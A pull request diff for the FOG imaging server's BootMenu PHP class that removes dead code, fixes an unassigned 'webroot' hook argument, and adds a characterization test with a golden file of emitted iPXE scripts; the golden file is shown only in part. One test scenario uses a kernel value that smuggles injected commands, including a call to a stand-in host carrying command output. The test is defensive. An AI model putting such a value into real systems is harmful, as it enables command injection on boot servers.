### PR TITLE
Remove dead code in BootMenu and pin its iPXE output with a test

### DIFF
--- a/packages/web/lib/fog/bootmenu.class.php
+++ b/packages/web/lib/fog/bootmenu.class.php
@@ -308,10 +308,7 @@ class BootMenu extends FOGBase
             . 'chain -ar ${boot-url}/service/ipxe/refind_x64.efi',
             "\n"
         );
-        $reboot = sprintf(
-            'reboot',
-            "\n"
-        );
+        $reboot = 'reboot';
 
         if (isset($_REQUEST['arch']) && stripos($_REQUEST['arch'], 'i386') !== false) {
             //user i386 boot loaders instead
@@ -388,6 +385,16 @@ class BootMenu extends FOGBase
          */
         $bootroot = trim((string)$curroot, '/');
         $curroot = '/' . ($bootroot === '' ? '' : $bootroot . '/');
+        /**
+         * BOOT_ITEM_NEW_SETTINGS passes 'webroot' by reference, but no
+         * $webroot was ever assigned, so PHP created it at the call and
+         * every plugin reading it saw NULL. Bind it to the bare form that
+         * accompanies 'webserver' in the same payload -- the value
+         * 'set fog-webroot' emits -- so the argument means what its name
+         * says. Writes to it are still discarded; nothing downstream
+         * reads the argument back.
+         */
+        $webroot = $bootroot;
         $this->_web = sprintf('%s://%s%s', self::$httpproto, $webserver, $curroot);
         $Send['booturl'] = array(
             '#!ipxe',
@@ -566,7 +573,6 @@ class BootMenu extends FOGBase
                 )
             );
         }
-        $kernel = $bzImage;
         $initrd = $imagefile;
         $this->_timeout = $timeout;
         $this->_hiddenmenu = ($hiddenmenu && !(isset($_REQUEST['menuAccess']) && $_REQUEST['menuAccess']));
@@ -777,7 +783,6 @@ class BootMenu extends FOGBase
      */
     private function _chainBoot($debug = false, $shortCircuit = false)
     {
-        $debug = $debug;
         if (!(isset($this->_hiddenmenu) && $this->_hiddenmenu) || $shortCircuit) {
             $Send['chainnohide'] = array(
                 'set arch ${buildarch}',
@@ -2221,7 +2226,6 @@ class BootMenu extends FOGBase
             $this->_chainBoot(true);
             return;
         }
-        $Menus = self::getClass('PXEMenuOptionsManager')->find('', '', 'id');
         $ipxeGrabs = array(
             'FOG_ADVANCED_MENU_LOGIN',
             'FOG_IPXE_BG_FILE',

--- a/tests/bootmenu-ipxe-output.test.php
+++ b/tests/bootmenu-ipxe-output.test.php
@@ -1,0 +1,411 @@
+<?php
+/**
+ * Characterization test for the iPXE script BootMenu emits.
+ *
+ * BootMenu has no return value worth checking: every screen is an array of
+ * strings that _parseMe() flattens straight to stdout, and that stdout IS
+ * the iPXE program the client runs. So the only meaningful assertion is a
+ * byte comparison of the emitted script.
+ *
+ * The golden file was generated from bootmenu.class.php as it stood BEFORE
+ * the dead-code removal it now guards, which is what makes it proof rather
+ * than decoration: the cleanup is correct exactly insofar as the bytes did
+ * not move. It doubles as a regression net for future edits to a file where
+ * a stray line is a client that will not boot.
+ *
+ * Each scenario runs in its own process because several paths -- noMenu()
+ * and the tasking path -- end in exit().
+ *
+ * Usage:
+ *   php tests/bootmenu-ipxe-output.test.php            # compare to golden
+ *   php tests/bootmenu-ipxe-output.test.php --update   # rewrite golden
+ *   php tests/bootmenu-ipxe-output.test.php --against <file.php>
+ *
+ * Exit status 0 = pass, 1 = fail.
+ */
+
+$root = dirname(__DIR__);
+$renderer = __DIR__ . '/lib/bootmenu-render.php';
+$golden = __DIR__ . '/fixtures/bootmenu-ipxe-output.golden';
+$classFile = $root . '/packages/web/lib/fog/bootmenu.class.php';
+
+$update = in_array('--update', $argv, true);
+$againstAt = array_search('--against', $argv, true);
+if (false !== $againstAt && isset($argv[$againstAt + 1])) {
+    $classFile = $argv[$againstAt + 1];
+}
+
+if (!is_file($classFile)) {
+    fwrite(STDERR, "FAIL: no such class file: $classFile\n");
+    exit(1);
+}
+
+/*
+ * The matrix. Each entry names a branch of BootMenu that renders differently,
+ * so a change that moves any of these bytes shows up as a diff rather than as
+ * a client that silently fails to boot.
+ *
+ * Coverage is deliberate, not exhaustive:
+ *  - every exit type, because each is a distinct chunk of iPXE built in the
+ *    constructor, and 'reboot' in particular was built through a pointless
+ *    sprintf() that this test pins the output of;
+ *  - every arch, because bzImage/init and the refind loader all switch on it;
+ *  - hidden vs shown menu, which is the only path through _chainBoot();
+ *  - registered / pending / unregistered, which select the pxeRegOnly set and
+ *    therefore which menu rows exist at all;
+ *  - MOK.der present and absent, the two branches of the Secure Boot choice;
+ *  - bios vs efi, which decides both the exit-type setting read and whether
+ *    pxeID 14 is filtered out.
+ */
+$scenarios = array(
+    'unregistered-bios-x86' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+    ),
+    'unregistered-efi-x86' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'efi'),
+    ),
+    'unregistered-efi-x86-mok' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'efi'),
+        'mok' => true,
+    ),
+    'unregistered-efi-i386' => array(
+        'request' => array('arch' => 'i386', 'platform' => 'efi'),
+    ),
+    'unregistered-efi-arm64' => array(
+        'request' => array('arch' => 'arm64', 'platform' => 'efi'),
+    ),
+    'unregistered-no-platform' => array(
+        'request' => array('arch' => 'x86_64'),
+    ),
+    'registered-bios' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'host' => array('id' => 1, 'name' => 'testhost'),
+    ),
+    'registered-efi-mok' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'efi'),
+        'host' => array('id' => 1, 'name' => 'testhost'),
+        'mok' => true,
+    ),
+    'pending-approval' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'host' => array('id' => 1, 'name' => 'testhost', 'pending' => 1),
+    ),
+    'registered-host-kernel-override' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'host' => array(
+            'id' => 1,
+            'name' => 'testhost',
+            'kernel' => 'custom-bzImage',
+            'init' => 'custom-init.xz',
+            'kernelArgs' => 'nomodeset',
+        ),
+    ),
+    'arm64-host-x86-kernel-override' => array(
+        'request' => array('arch' => 'arm64', 'platform' => 'efi'),
+        'host' => array(
+            'id' => 1, 'name' => 'testhost', 'kernel' => 'custom-bzImage'
+        ),
+    ),
+    'arm64-host-arm-kernel-override' => array(
+        'request' => array('arch' => 'arm64', 'platform' => 'efi'),
+        'host' => array(
+            'id' => 1, 'name' => 'testhost', 'kernel' => 'arm_custom_Image'
+        ),
+    ),
+    'x86-host-arm-kernel-override' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'efi'),
+        'host' => array(
+            'id' => 1, 'name' => 'testhost', 'init' => 'arm_init.cpio.gz'
+        ),
+    ),
+    'host-kernel-override-unsafe-chars' => array(
+        'request' => array('arch' => 'arm64', 'platform' => 'efi'),
+        'host' => array(
+            'id' => 1,
+            'name' => 'testhost',
+            'kernel' => 'evil; echo pwned && chain http://x/`id`',
+        ),
+    ),
+    'debug-requested' => array(
+        'request' => array(
+            'arch' => 'x86_64', 'platform' => 'bios', 'debug' => 1
+        ),
+        'host' => array('id' => 1, 'name' => 'testhost'),
+    ),
+    'registration-disabled' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_REGISTRATION_ENABLED' => '0'),
+    ),
+    'advanced-menu' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_PXE_ADVANCED' => '1'),
+    ),
+    'advanced-menu-login' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array(
+            'FOG_PXE_ADVANCED' => '1', 'FOG_ADVANCED_MENU_LOGIN' => '1'
+        ),
+    ),
+    'hidden-menu' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_PXE_MENU_HIDDEN' => '1'),
+    ),
+    'hidden-menu-keyseq' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array(
+            'FOG_PXE_MENU_HIDDEN' => '1', 'FOG_KEY_SEQUENCE' => 'F12'
+        ),
+    ),
+    'hidden-menu-accessed' => array(
+        'request' => array(
+            'arch' => 'x86_64', 'platform' => 'bios', 'menuAccess' => 1
+        ),
+        'settings' => array('FOG_PXE_MENU_HIDDEN' => '1'),
+    ),
+    'exit-sanboot' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_BOOT_EXIT_TYPE' => 'sanboot'),
+    ),
+    'exit-reboot' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_BOOT_EXIT_TYPE' => 'reboot'),
+    ),
+    'exit-exit' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_BOOT_EXIT_TYPE' => 'exit'),
+    ),
+    'exit-grub' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_BOOT_EXIT_TYPE' => 'grub'),
+    ),
+    'exit-grub-first-cdrom' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_BOOT_EXIT_TYPE' => 'grub_first_cdrom'),
+    ),
+    'exit-grub-first-found-windows' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_BOOT_EXIT_TYPE' => 'grub_first_found_windows'),
+    ),
+    'exit-refind-efi' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'efi'),
+        'settings' => array('FOG_EFI_BOOT_EXIT_TYPE' => 'refind_efi'),
+    ),
+    'exit-unknown-falls-back-to-sanboot' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_BOOT_EXIT_TYPE' => 'not-a-real-exit-type'),
+    ),
+    'host-exit-override' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'host' => array('id' => 1, 'name' => 'testhost', 'biosexit' => 'reboot'),
+    ),
+    'no-menu' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'host' => array('id' => 1, 'name' => 'testhost'),
+        'settings' => array('FOG_NO_MENU' => '1'),
+    ),
+    'keymap-set' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_KEYMAP' => 'uk'),
+    ),
+    'keymap-norwegian' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_KEYMAP' => 'no-latin1'),
+    ),
+    'keymap-serbian' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_KEYMAP' => 'sr'),
+    ),
+    'kernel-args-and-debug' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array(
+            'FOG_KERNEL_ARGS' => 'acpi=off',
+            'FOG_KERNEL_DEBUG' => '1',
+        ),
+    ),
+    'nested-webroot' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_WEB_ROOT' => '/apps/fog/'),
+    ),
+    'bare-webroot' => array(
+        'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        'settings' => array('FOG_WEB_ROOT' => 'fog'),
+    ),
+);
+
+/**
+ * Renders one scenario in a child process.
+ *
+ * @param string $renderer  path to the renderer
+ * @param array  $scenario  the scenario definition
+ * @param string $classFile the BootMenu source under test
+ *
+ * @return string the emitted iPXE script, plus any stderr
+ */
+function renderScenario($renderer, array $scenario, $classFile)
+{
+    $cmd = sprintf(
+        '%s %s %s %s 2>&1',
+        escapeshellarg(PHP_BINARY),
+        escapeshellarg($renderer),
+        escapeshellarg(json_encode($scenario)),
+        escapeshellarg($classFile)
+    );
+    $out = shell_exec($cmd);
+    return null === $out ? '' : $out;
+}
+
+$actual = '';
+foreach ($scenarios as $name => $scenario) {
+    $actual .= "########## $name ##########\n";
+    $actual .= rtrim(renderScenario($renderer, $scenario, $classFile), "\n");
+    $actual .= "\n\n";
+}
+
+if ($update) {
+    if (!is_dir(dirname($golden))) {
+        mkdir(dirname($golden), 0775, true);
+    }
+    file_put_contents($golden, $actual);
+    printf(
+        "bootmenu-ipxe-output: wrote golden from %s (%d scenarios, %d bytes)\n",
+        str_replace($root . '/', '', $classFile),
+        count($scenarios),
+        strlen($actual)
+    );
+    exit(0);
+}
+
+if (!is_file($golden)) {
+    fwrite(STDERR, "FAIL: golden file missing: $golden\n");
+    fwrite(STDERR, "Generate it with --update against the pre-change source.\n");
+    exit(1);
+}
+
+$expected = file_get_contents($golden);
+
+printf(
+    "bootmenu-ipxe-output: %d scenarios, %d bytes rendered\n",
+    count($scenarios),
+    strlen($actual)
+);
+
+/*
+ * A rendered scenario that is empty, or that carries a PHP diagnostic, means
+ * the harness broke rather than that the output matched. Catch that here so a
+ * silently-empty render can never be mistaken for a pass.
+ */
+$broken = array();
+foreach ($scenarios as $name => $scenario) {
+    $chunk = renderScenario($renderer, $scenario, $classFile);
+    if ('' === trim($chunk)) {
+        $broken[] = "$name: rendered nothing";
+        continue;
+    }
+    if (preg_match('/(Fatal error|Parse error|Uncaught|harness:)/i', $chunk, $m)) {
+        $broken[] = "$name: {$m[1]} in rendered output";
+    }
+    if (false === strpos($chunk, '#!ipxe')) {
+        $broken[] = "$name: output does not start an iPXE script";
+    }
+}
+if ($broken) {
+    foreach ($broken as $b) {
+        fwrite(STDERR, "\nFAIL: $b\n");
+    }
+    exit(1);
+}
+
+/*
+ * Hook-argument checks.
+ *
+ * BOOT_ITEM_NEW_SETTINGS is the seam plugins use to retarget a boot, and what
+ * it hands them never appears in the emitted script -- so the golden file
+ * cannot cover it. 'webroot' in particular was passed by reference without
+ * ever being assigned, meaning every plugin that read it got NULL; these
+ * checks fail against that older source and pass against the fixed one.
+ */
+$hookChecks = array(
+    'webroot reaches plugins as the bare form' => array(
+        'scenario' => array(
+            'hooks' => true,
+            'host' => array('id' => 1, 'name' => 'testhost'),
+            'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+        ),
+        'expect' => array('webserver' => '10.0.0.1', 'webroot' => 'fog'),
+    ),
+    'webroot keeps every segment of a nested install' => array(
+        'scenario' => array(
+            'hooks' => true,
+            'host' => array('id' => 1, 'name' => 'testhost'),
+            'request' => array('arch' => 'x86_64', 'platform' => 'bios'),
+            'settings' => array('FOG_WEB_ROOT' => '/apps/fog/'),
+        ),
+        'expect' => array('webroot' => 'apps/fog'),
+    ),
+);
+
+$hookFailures = array();
+foreach ($hookChecks as $label => $check) {
+    $raw = renderScenario($renderer, $check['scenario'], $classFile);
+    $fired = json_decode($raw, true);
+    if (!is_array($fired)) {
+        $hookFailures[] = "$label: could not decode hook payloads";
+        continue;
+    }
+    $scalars = null;
+    foreach ($fired as $event) {
+        if ('BOOT_ITEM_NEW_SETTINGS' === ($event['event'] ?? '')) {
+            $scalars = $event['scalars'] ?? array();
+            break;
+        }
+    }
+    if (null === $scalars) {
+        $hookFailures[] = "$label: BOOT_ITEM_NEW_SETTINGS never fired";
+        continue;
+    }
+    foreach ($check['expect'] as $key => $want) {
+        $have = array_key_exists($key, $scalars) ? $scalars[$key] : '<absent>';
+        if ($have !== $want) {
+            $hookFailures[] = sprintf(
+                "%s: '%s' was %s, expected %s",
+                $label,
+                $key,
+                var_export($have, true),
+                var_export($want, true)
+            );
+        }
+    }
+}
+if ($hookFailures) {
+    fwrite(STDERR, "\nFAIL: hook arguments\n");
+    foreach ($hookFailures as $f) {
+        fwrite(STDERR, "  $f\n");
+    }
+    exit(1);
+}
+printf("bootmenu-ipxe-output: %d hook-argument checks passed\n", count($hookChecks));
+
+if ($actual === $expected) {
+    echo "PASS\n";
+    exit(0);
+}
+
+fwrite(STDERR, "\nFAIL: emitted iPXE differs from the golden file.\n\n");
+
+$aLines = explode("\n", $expected);
+$bLines = explode("\n", $actual);
+$max = max(count($aLines), count($bLines));
+$shown = 0;
+for ($i = 0; $i < $max && $shown < 40; $i++) {
+    $a = $aLines[$i] ?? '<missing>';
+    $b = $bLines[$i] ?? '<missing>';
+    if ($a === $b) {
+        continue;
+    }
+    fwrite(STDERR, sprintf("  line %d:\n    -golden: %s\n    +actual: %s\n", $i + 1, $a, $b));
+    $shown++;
+}
+if ($shown >= 40) {
+    fwrite(STDERR, "  ... further differences suppressed\n");
+}
+exit(1);

--- a/tests/fixtures/bootmenu-ipxe-output.golden
+++ b/tests/fixtures/bootmenu-ipxe-output.golden
@@ -1,0 +1,2895 @@
+########## unregistered-bios-x86 ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## unregistered-efi-x86 ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+item fog.secureboot Enroll Secure Boot Key
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+imgfetch ${boot-url}/service/ipxe/refind.conf
+chain -ar ${boot-url}/service/ipxe/refind_x64.efi || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:fog.secureboot
+echo Secure Boot signing is not configured on this FOG server.
+echo Nothing to enroll -- returning to the menu...
+sleep 5
+goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## unregistered-efi-x86-mok ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+item fog.secureboot Enroll Secure Boot Key
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+imgfetch ${boot-url}/service/ipxe/refind.conf
+chain -ar ${boot-url}/service/ipxe/refind_x64.efi || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:fog.secureboot
+imgfetch http://10.0.0.1/fog/service/secureboot/MOK.der MOK.der || echo Could not fetch MOK.der over the network.
+echo MOK.der has been downloaded into memory as MOK.der --
+echo look for it under Enroll key from disk.
+echo MokManager gives up after about 10 seconds with no
+echo keypress, and reboots if left idle for a few minutes --
+echo be ready before it appears.
+echo If it is not listed there, have MOK.der on a
+echo FAT-formatted USB stick in this machine instead.
+sleep 8
+chain -ar http://10.0.0.1/fog/service/secureboot/mmx64.efi || echo Could not load the Secure Boot enrolment menu. && sleep 5 && goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## unregistered-efi-i386 ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+item fog.secureboot Enroll Secure Boot Key
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+imgfetch ${boot-url}/service/ipxe/refind.conf
+chain -ar ${boot-url}/service/ipxe/refind_ia32.efi || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage32 loglevel=4 initrd=init_32.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init_32.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage32 loglevel=4 initrd=init_32.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init_32.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage32 loglevel=4 initrd=init_32.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init_32.xz
+boot || goto MENU
+:fog.secureboot
+echo Secure Boot signing is not configured on this FOG server.
+echo Nothing to enroll -- returning to the menu...
+sleep 5
+goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## unregistered-efi-arm64 ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
